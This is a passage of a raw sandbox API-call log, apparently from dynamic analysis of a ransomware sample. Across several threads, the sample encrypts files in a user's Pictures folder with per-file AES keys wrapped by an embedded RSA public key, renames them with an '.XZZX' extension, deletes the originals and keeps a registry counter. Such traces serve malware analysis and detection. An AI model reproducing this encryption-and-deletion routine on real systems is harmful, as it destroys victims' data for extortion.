LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0121.536] OutputDebugStringW (lpOutputString="end") [0121.537] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ5\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x435dbf4, pcbBinary=0x435d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x435dbf4, pcbBinary=0x435d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0121.537] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x435dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x435d3dc, pcbStructInfo=0x435d3d8 | out: pvStructInfo=0x435d3dc, pcbStructInfo=0x435d3d8) returned 1 [0121.537] CryptAcquireContextW (in: phProv=0x435d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x435d3e4*=0x3ce1758) returned 1 [0121.537] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce1758, dwCertEncodingType=0x1, pInfo=0x3cb1aa8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb1ad8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb1ae0*, PublicKey.cUnusedBits=0x0), phKey=0x435d3ec | out: phKey=0x435d3ec*=0x3a5fd0) returned 1 [0121.537] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0121.538] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0121.538] CryptEncrypt (in: hKey=0x3a5fd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x435d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x435d3f0*=0x80) returned 1 [0121.538] CryptEncrypt (in: hKey=0x3a5fd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce17e0*, pdwDataLen=0x435d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce17e0*, pdwDataLen=0x435d3e8*=0x80) returned 1 [0121.538] WriteFile (in: hFile=0x5b0, lpBuffer=0x3ce17e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce17e0*, lpNumberOfBytesWritten=0x435e438*=0x80, lpOverlapped=0x0) returned 1 [0121.538] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0121.538] WriteFile (in: hFile=0x5b0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x435e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x435e438*=0x5, lpOverlapped=0x0) returned 1 [0121.538] GetUserNameW (in: lpBuffer=0x435e1f8, pcbBuffer=0x435dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x435dfe0) returned 1 [0121.538] wsprintfW (in: param_1=0x435dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0121.538] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x435dfe4 | out: phkResult=0x435dfe4*=0x5b8) returned 0x0 [0121.538] RegQueryValueExW (in: hKey=0x5b8, lpValueName="E1010314", lpReserved=0x0, lpType=0x435dfd8, lpData=0x435dfec, lpcbData=0x435dfdc*=0x4 | out: lpType=0x435dfd8*=0x4, lpData=0x435dfec*=0x82, lpcbData=0x435dfdc*=0x4) returned 0x0 [0121.538] RegCloseKey (hKey=0x5b8) returned 0x0 [0121.538] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x435dfe8 | out: phkResult=0x435dfe8*=0x5b8) returned 0x0 [0121.539] RegSetValueExW (in: hKey=0x5b8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x435dfec*=0x83, cbData=0x4 | out: lpData=0x435dfec*=0x83) returned 0x0 [0121.539] RegCloseKey (hKey=0x5b8) returned 0x0 [0121.539] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.539] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.539] CloseHandle (hObject=0x5b0) returned 1 [0121.540] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0121.541] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0121.541] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9s0pX7t.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\9s0px7t.png")) returned 1 [0121.542] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\9s0pX7t.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\9s0px7t.png")) returned 0 Thread: id = 395 os_tid = 0x93c [0121.498] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0121.498] lstrcpyW (in: lpString1=0x420f460, lpString2="aqn8.gif" | out: lpString1="aqn8.gif") returned="aqn8.gif" [0121.498] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0121.498] SetErrorMode (uMode=0x1) returned 0x1 [0121.499] lstrcpyW (in: lpString1=0x420f860, lpString2="aqn8.gif" | out: lpString1="aqn8.gif") returned="aqn8.gif" [0121.499] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x71d28504, Data2=0xd907, Data3=0x49a0, Data4=([0]=0x9c, [1]=0x6b, [2]=0xd9, [3]=0xd6, [4]=0xe, [5]=0x96, [6]=0x7d, [7]=0x40))) returned 0x0 [0121.499] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aqn8.gif") returned 51 [0121.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0121.499] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8F82071C3E6AA36071D28504428B87A8.XZZX") returned 80 [0121.499] StrStrW (lpFirst="aqn8.gif", lpSrch="XZZX") returned 0x0 [0121.499] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aqn8.gif", dwFileAttributes=0x20) returned 1 [0121.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aqn8.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aqn8.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b4 [0121.543] ReadFile (in: hFile=0x5b4, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0x106b1, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x420e418*=0x106b1, lpOverlapped=0x0) returned 1 [0121.544] CloseHandle (hObject=0x5b4) returned 1 [0121.544] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0121.544] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0121.545] SetErrorMode (uMode=0x1) returned 0x1 [0121.545] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0121.545] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce1868) returned 1 [0121.547] CryptGenKey (in: hProv=0x3ce1868, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5e90) returned 1 [0121.684] CryptExportKey (in: hKey=0x3a5e90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0121.684] CryptExportKey (in: hKey=0x3a5e90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x420e41c | out: pbData=0x40a0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0121.684] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0121.685] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0121.685] CryptDestroyKey (hKey=0x3a5e90) returned 1 [0121.685] CryptReleaseContext (hProv=0x3ce1868, dwFlags=0x0) returned 1 [0121.685] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8F82071C3E6AA36071D28504428B87A8.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8f82071c3e6aa36071d28504428b87a8.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b8 [0121.686] WriteFile (in: hFile=0x5b8, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0x106b1, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x420e438*=0x106b1, lpOverlapped=0x0) returned 1 [0121.687] SetFilePointer (in: hFile=0x5b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x106b1 [0121.687] WriteFile (in: hFile=0x5b8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0121.687] SetFilePointer (in: hFile=0x5b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x106b6 [0121.687] WriteFile (in: hFile=0x5b8, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x10, lpOverlapped=0x0) returned 1 [0121.687] SetFilePointer (in: hFile=0x5b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x106c6 [0121.687] WriteFile (in: hFile=0x5b8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0121.687] SetFilePointer (in: hFile=0x5b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x106cb [0121.687] SetErrorMode (uMode=0x1) returned 0x1 [0121.687] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0121.687] OutputDebugStringW (lpOutputString="end") [0121.687] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0121.687] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0121.687] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3ce1868) returned 1 [0121.688] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce1868, dwCertEncodingType=0x1, pInfo=0x3cb1b78*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb1ba8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb1bb0*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a6010) returned 1 [0121.688] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0121.688] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0121.689] CryptEncrypt (in: hKey=0x3a6010, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0121.689] CryptEncrypt (in: hKey=0x3a6010, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce18f0*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce18f0*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0121.689] WriteFile (in: hFile=0x5b8, lpBuffer=0x3ce18f0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce18f0*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0121.689] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0121.689] WriteFile (in: hFile=0x5b8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0121.689] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0121.689] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0121.689] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x5bc) returned 0x0 [0121.689] RegQueryValueExW (in: hKey=0x5bc, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x83, lpcbData=0x420dfdc*=0x4) returned 0x0 [0121.689] RegCloseKey (hKey=0x5bc) returned 0x0 [0121.689] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x5bc) returned 0x0 [0121.689] RegSetValueExW (in: hKey=0x5bc, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x84, cbData=0x4 | out: lpData=0x420dfec*=0x84) returned 0x0 [0121.689] RegCloseKey (hKey=0x5bc) returned 0x0 [0121.689] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.690] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.690] CloseHandle (hObject=0x5b8) returned 1 [0121.691] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0121.691] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0121.691] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aqn8.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aqn8.gif")) returned 1 [0121.692] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\aqn8.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\aqn8.gif")) returned 0 Thread: id = 396 os_tid = 0x940 [0121.670] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0121.670] lstrcpyW (in: lpString1=0x434f460, lpString2="azuNey.jpg" | out: lpString1="azuNey.jpg") returned="azuNey.jpg" [0121.670] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0121.670] SetErrorMode (uMode=0x1) returned 0x1 [0121.670] lstrcpyW (in: lpString1=0x434f860, lpString2="azuNey.jpg" | out: lpString1="azuNey.jpg") returned="azuNey.jpg" [0121.670] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x63dbf2ec, Data2=0x644a, Data3=0x40b6, Data4=([0]=0xae, [1]=0x22, [2]=0x8d, [3]=0xed, [4]=0x9c, [5]=0x62, [6]=0xdc, [7]=0x48))) returned 0x0 [0121.670] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\azuNey.jpg") returned 53 [0121.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0121.670] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C87868381959CC9C63DBF2EC1D8EB0E4.XZZX") returned 80 [0121.670] StrStrW (lpFirst="azuNey.jpg", lpSrch="XZZX") returned 0x0 [0121.670] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\azuNey.jpg", dwFileAttributes=0x20) returned 1 [0121.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\azuNey.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\azuney.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a4 [0121.693] ReadFile (in: hFile=0x5a4, lpBuffer=0x3ce36b8, nNumberOfBytesToRead=0x7df2, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3ce36b8*, lpNumberOfBytesRead=0x434e418*=0x7df2, lpOverlapped=0x0) returned 1 [0121.694] CloseHandle (hObject=0x5a4) returned 1 [0121.694] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0121.695] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0121.695] SetErrorMode (uMode=0x1) returned 0x1 [0121.695] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0121.695] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce1978) returned 1 [0121.697] CryptGenKey (in: hProv=0x3ce1978, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5e90) returned 1 [0122.038] CryptExportKey (in: hKey=0x3a5e90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0122.038] CryptExportKey (in: hKey=0x3a5e90, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x434e41c | out: pbData=0x40a0000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0122.038] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0122.038] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0122.038] CryptDestroyKey (hKey=0x3a5e90) returned 1 [0122.038] CryptReleaseContext (hProv=0x3ce1a00, dwFlags=0x0) returned 0 [0122.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C87868381959CC9C63DBF2EC1D8EB0E4.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c87868381959cc9c63dbf2ec1d8eb0e4.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0122.039] WriteFile (in: hFile=0x5c8, lpBuffer=0x3ce36b8*, nNumberOfBytesToWrite=0x7df2, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce36b8*, lpNumberOfBytesWritten=0x434e438*=0x7df2, lpOverlapped=0x0) returned 1 [0122.040] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7df2 [0122.040] WriteFile (in: hFile=0x5c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0122.040] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7df7 [0122.040] WriteFile (in: hFile=0x5c8, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x14, lpOverlapped=0x0) returned 1 [0122.040] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7e0b [0122.040] WriteFile (in: hFile=0x5c8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0122.040] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7e10 [0122.040] SetErrorMode (uMode=0x1) returned 0x1 [0122.040] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 